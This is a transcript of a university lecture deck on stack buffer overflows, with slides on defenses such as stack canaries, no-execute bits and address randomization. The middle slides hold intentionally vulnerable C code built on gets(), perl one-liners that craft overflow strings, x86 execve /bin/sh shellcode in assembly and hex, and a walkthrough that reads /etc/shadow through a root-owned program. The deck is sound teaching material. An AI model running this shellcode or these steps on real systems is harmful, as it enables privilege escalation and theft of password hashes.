Presentation is loading. Please wait.

Presentation is loading. Please wait.

Buffer Overflow CS461/ECE422 Spring 2012. Reading Material Based on Chapter 11 of the text.

Published byGary Griffith Modified over 8 years ago

Similar presentations

Presentation on theme: "Buffer Overflow CS461/ECE422 Spring 2012. Reading Material Based on Chapter 11 of the text."— Presentation transcript:

1 Buffer Overflow CS461/ECE422 Spring 2012

2 Reading Material Based on Chapter 11 of the text

3 Outline Buffer Overflow Stack Buffer Overflow Shell Code Defenses

4 Buffer Overflow “A condition at interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information.” Used for exploitation – Crash – Get control

5 Example 1.#include 2.#include 3.int main(int argc, char *argv[]) { 4.int valid = 0; 5.char str1[8] = "ASECRET"; 6.char str2[8]; 7.gets(str2); 8.if (strncmp(str1, str2, 8)==0) 9.valid = 1; 10.printf("VALID=%d", valid); 11.return 0; 12.}

6 Example $./a.out ASECRET VALID=1 $./a.out HELLO VALID=0 $./a.out OVERFLOWOVERFLOW VALID=1 Why?

7 Example argv argc return address old base pointer valid str1[4-7] str1[0-3] str2[4-7] str2[0-3] FLOW OVER FLOW OVER 0x1000000 argv argc return address old base pointer valid str1[4-7] str1[0-3] str2[4-7] str2[0-3] T... ASECRE... 0x0000000 After gets(str2) str2=“OVERFLOWOVERFLOW” Before gets(str2)

8 Stack Structure Review buf[0-255] saved frame pointer return address function args (char* c) previous frames stack pointer frame pointer mem addresses high low void foo(char* c) { char buf[256]; strcpy(buf, c); }

9 Stack Buffer Overflow Also called Stack smashing Overflow when targeted buffer is located on stack, as a local variable in stack frame of a function Overwrite return address/frame pointer or pointer to address of attack code in memory Example in next slide – Overwrite saved return address (RA) – E.g., overwrite saved RA with same RA of function to re-execute it.

10 Example 1.#include 2.#include 3.void prompt(char * tag) { 4. char inp[16]; 5. printf(“Enter value for %s: “, tag); 6. gets(inp); 7. printf(“Hello your %s is %s\n”, tag, inp); 8.} 9.int main(int argc, char *argv[]) { 10. prompt(“name”); 11.}

11 Example Run debugger, prompt() at 0x08048394 inp located 24 bytes under current frame ptr – Pad the string by this amount (e.g. 24 A ’s) Choose a nearby stack location ( 0xbfffffe8 ) to overwrite current frame register Overwrite return address with 0x08048394 Combine this data together into binary string perl –e ‘print pack(“H*”, hex string);’

12 Example tag return address old base pointer inp[12-15] inp[8-11] inp[4-7] inp[0-3] AAAA tag return address old base pointer inp[12-15] inp[8-11] inp[4-7] inp[0-3]... After gets(..) callBefore gets(..) call f0830408 e8fbffbf 94830408 e8ffffbf $ perl –e ' print pack(“H*”, hex string); ' |./a.out Enter value for name: Hello your Re?pyy]uEA is AAAAAAAAAAAAAAAAAAAAAAAuyu Enter value for Kyyu: Hello your Kyyu is NNNN Segmentation fault prompt(..) is called twice! * Little endian

13 Stack Buffer Overflow What if we want to do something more interesting than calling prompt (..) twice? Can set the return address to point to custom code held within the stack frame (shellcode).

14 Shellcode Want to transfer execution of program to code stored in the buffer we overflow. Why “shell” code? Launch a shell. – Run any program – With privilege of exploited program

15 Shellcode int main(int argc, char * argv[]) { char *sh; char *args[2]; sh=“/bin/sh”; args[0] = sh; args[1] = NULL; execve(sh, args, NULL); } nop jmpfind cont:pop%esi xor%eax, %eax mov%al, 0x7*%esi) lea(%esi), %ebx mov %esi,0x8(%esi) mov%eax,0xc(%esi) mov$0xb, %al mov%esi, %ebx lea0x8(%esi),%ecx lea0xc(%esi),%edx int$0x80 find:call cont sh:.string “/bin/sh “ args:.long 0.long 0 90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20 To x86 assembly To hex value for compiled x86 code nop sled Launches Bourne shell ( sh ) on Intel Linux system Payload

16 Shellcode Target program with elevated privileges and vulnerable buffer – E.g., start with similar program to previous inp example and say it is owned by root. Let’s say we want to be able to read /etc/shadow, which needs superuser privilege, but we only have a non-root account.

17 Shellcode buffer saved frame pointer return address args previous frame NOP shellcode payload Address a previous frame 0xbffffbc0 0xbffffc08 perl –e ‘print pack(“H*”, hex string); print “cat /etc/shadow\n”;’ |./a.out 88 bytes Before gets(..) call After gets(..) call

18 Shellcode Before, our user cannot access /etc/shadow This exploit code will open /bin/sh and display the contents of /etc/shadow by sending the shell the cat command using root privilege

19 Shellcode As normal user As superuser

20 Shellcode Some notes about shellcode: – Shellcode usually comes from sites like Metasploit project.Metasploit project – Cannot use bytes with NULL value. Can use xor %eax, %eax command to obtain 0 value – Shellcode is mostly used to allow shell commands to execute other commands and send back data to attacker.

21 Return to System Call Non-executable stack defense – Cannot execute code held in stack Make code call library function through a set of memory location manipulations RA changed to jump to existing system library function, e.g. system(“shell command line”) in order to launch shell commands. Defend by randomizing stack and system libraries

22 Defenses Compile-Time – Programming Language Choice – Extensions / Safe Libraries – Stack Protection Run-Time – Executable Address Space Protection – Address Space Randomization

23 Compile-Time Programming Language Choice – High-level (e.g. Java) Strongly typed variables Operations permitted – Not as vulnerable Range checking – Downside, resource use

24 Compile-Time Extensions / Safe Libraries – Replace standard library routines (e.g. C strings) with safer versions Rewrite source with new calls (like strlcpy(..) ) Replace whole library (like libsafe), provides protection without recompilation – Puts additional checks to stop some buffer overflow attacks

25 Compile-Time Stack Protection – Check stack frame corruption – StackGuard Canary value Included in newer gcc – Return Address Defender Copy return address (RA) Safe location

26 Run-Time Executable Address Space Protection – Block execution of code on stack – No-execute bit – Assume executable code held elsewhere – Standard in newer O.S.’s (Vista+, Linux) and 64-bit processors

27 Run-Time Address Space Randomization – Stack buffer overflow: need to predict address of buffer in memory (decide what is proper RA value) – Change address stack location random per process – Address range is large (32 bit), provides much variation. Larger than most vulnerable buffers. – Therefore NOP-sled will not work (cannot get it large enough to handle large range.)

28 Summary Buffer overflow is a serious threat to systems. It is possible to disrupt system and perform unauthorized actions using stack buffer overflow attacks. Shellcode can be used to modify execution of a vulnerable program. There exist compile- and run-time protections against these attacks.

Download ppt "Buffer Overflow CS461/ECE422 Spring 2012. Reading Material Based on Chapter 11 of the text."

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.

Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.

Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.

Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.

Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.

Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.

Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
Lecture 16 Buffer Overflow

Lecture 16 Buffer Overflow
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.

Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.

Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Similar presentations

Ads by Google